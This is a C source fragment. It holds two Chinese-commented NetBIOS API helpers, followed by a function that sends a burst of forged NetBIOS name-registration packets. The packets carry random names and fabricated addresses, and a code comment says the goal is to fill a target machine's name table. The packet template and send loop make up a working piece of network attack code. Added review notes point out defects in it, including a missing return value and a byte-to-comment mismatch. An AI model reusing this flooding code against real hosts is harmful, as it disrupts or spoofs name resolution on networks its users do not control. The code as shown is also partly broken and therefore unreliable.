// 向本地名字表中添加名字 BOOL NBAddName (int nLana, LPCSTR szName) { NCB ncb; memset (&ncb, 0, sizeof (ncb)); // 清空ncb结构体 ncb.ncb_command = NCBADDNAME; // 执行NCBDDNAME命令,向本地名字表中添加一个唯一的名字 ncb.ncb_lana_num = nLana; // 设置lana_num资源,指定本地网络名字编号。 MakeNetbiosName ((char*) ncb.ncb_name, szName); // 将szName赋值到ncb.ncb_name中 Netbios (&ncb); // 执行NCBRESET命令 NBCheck (ncb); // 如果执行结果不正确,则输出ncb.ncb_retcode // 如果成功返回TRUE,否则返回FALSE return (NRC_GOODRET == ncb.ncb_retcode); }
// 获取指定LANA的网络适配器信息 // nLana, LANA编号 // pBuffer, 获取到的网络适配器缓冲区 // cbBuffer, 缓冲区长度 // szName, 主机名字 BOOL NBAdapterStatus (int nLana, PVOID pBuffer, int cbBuffer, LPCSTR szName) { NCB ncb; memset (&ncb, 0, sizeof (ncb)); // 清空ncb结构体 ncb.ncb_command = NCBASTAT; // 设置执行NCBASTAT命令,获取本地或远程网络适配器的状态 ncb.ncb_lana_num = nLana; // 设置LANA编号 ncb.ncb_buffer = (PUCHAR) pBuffer; // 将获取到的数据保存到参数pBuffer中 ncb.ncb_length = cbBuffer; // 设置缓冲区长度 MakeNetbiosName ((char*) ncb.ncb_callname, szName);// 设置参数ncb.ncb_callname Netbios (&ncb); // 执行NetBIOS命令 NBCheck (ncb); // 如果执行不成功,则输出返回值 // 如果成功返回TRUE,否则返回FALSE return (NRC_GOODRET == ncb.ncb_retcode); }
//------------------------------------------------------------------------------------------------
// Send nPacketCount 68-byte NetBIOS name-service packets over descriptor nSd.
// Each packet is a copy of the sPacket template with a fresh transaction ID,
// a random name from GenRandName() (encoded by MakeNetbiosName()) and an
// address whose last two octets are derived from the loop counter. The
// existing comment below states the author's intent (filling the target's
// name table). From a monitoring standpoint the observable pattern is a burst
// of registrations with consecutive IDs, a constant FLAGS/TTL/NB-FLAGS
// layout and fabricated addresses.
//   nSd           socket descriptor that write() is called on
//   nPacketCount  number of packets to send
// NOTE(review): the function is declared bool but never executes a return
// statement, so using its result is undefined behaviour; no caller is visible
// here to say what the intended value is.
bool FillTargetList(int nSd, unsigned int nPacketCount)
{
    // this is the original packet
    // NOTE(review): a string literal has type char[], not unsigned char[];
    // this initialisation is ill-typed (an unsigned char array initialised
    // from the literal would be well-formed).
    const unsigned char * sPacket = "\x00\x00" //ID
        "\x79\x00" //FLAGS
        "\x00\x01" //QUERIES
        "\x00\x00" //ANSWERS
        "\x00\x00" //AUTHORITHY RRS
        "\x00\x01" //ADDITIONAL RRS
        "\x20" // host start
        //!invalid host name (32 bytes from offset 0Dh - 2Dh)
        "\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41" // netbios host name
        "\x42\x4C" // host type
        "\x00" // end
        "\x00\x20"//TYPE NB
        "\x00\x01"//CLASS IN
        //Additional RRS
        "\xc0\x0c"
        "\x00\x20"//TYPE NB
        "\x00\x01"//CLASS IN
        "\x00\x00\x00\x78" //TTL
        "\x00\x06" // DATA Length
        "\x40\x00" // NB FLAGS
        "\xC8\xA8\x00\x00" // NB ADDRESS 192.168.x.x
        // NOTE(review): \xC8 is 200, not 192 (0xC0); the bytes and the
        // comment above disagree.
        ; //Total length 68 bytes
    // In order to fill up the reply buffer we need 96 netbios names with <1b> address on target machine
    unsigned char szWorkerPacket[68];   // one packet being assembled (same size as the template)
    int i = 0;                          // NOTE(review): signed, compared against unsigned nPacketCount below
    unsigned char nIpNet = 0, nIpHost = 0;
    unsigned short nIdBase = rand();    // NOTE(review): rand() is only varied if srand() was called elsewhere
    char szName[16], szNbName[31];      // assumes GenRandName fills at most 15 chars + NUL — confirm
    szNbName[30] = 0x0; // just for printing purposes set term byte to 0x00
    printf("[*] Sending %u packets, sleeping 3 seconds after 32 packets sent\n", nPacketCount);
    printf("-> ");
    fflush(stdout);
    // NOTE(review): i is promoted to unsigned for this comparison; fine while
    // nPacketCount <= INT_MAX, otherwise i overflows (UB) before the loop ends.
    for(i = 0; i < nPacketCount; i++)
    {
        // copy packet template
        memcpy(szWorkerPacket, sPacket, 68);
        // insert 2 byte id at offset 00h (host byte order of nIdBase, not network order)
        memcpy(szWorkerPacket, &nIdBase, 2);
        nIdBase++;
        // gen rand name
        GenRandName(szName);
        // translate into netbios format
        // assumes MakeNetbiosName(src, dst) writes exactly 30 bytes into szNbName — confirm
        MakeNetbiosName(szName, szNbName);
        // insert name into the packet at offset 0D
        memcpy(szWorkerPacket + 0x0D, szNbName, 0x1E);
        // insert IP network part at offset 42h
        // NOTE(review): i / 255 is truncated to one byte, so the address
        // repeats once i reaches 255 * 256.
        nIpNet = i / 255;
        memcpy(szWorkerPacket + 0x42, &nIpNet, 0x01);
        // insert IP host part at offset 43h, use value of i
        nIpHost = i % 255;
        memcpy(szWorkerPacket + 0x43, &nIpHost, 0x01);
        // increment id
        // NOTE(review): nIdBase was already incremented right after it was
        // copied into the packet, so IDs advance by two per packet — confirm
        // this is intended.
        nIdBase++;
        //!Packet ready, lets send
        // NOTE(review): the return value of write() is discarded; an error
        // or short write goes unnoticed and the "sent" count printed at the
        // end is then wrong.
        write(nSd, szWorkerPacket, 68);
        // NOTE(review): despite the banner above, nothing in this function
        // sleeps; only a progress dot is printed every 32 packets.
        if((i + 1) % 32 == 0)
        {
            printf(".");
            fflush(stdout);
        }
    }
    printf("\n[*] Done, sent %u packets\n", nPacketCount);
    fflush(stdout);
}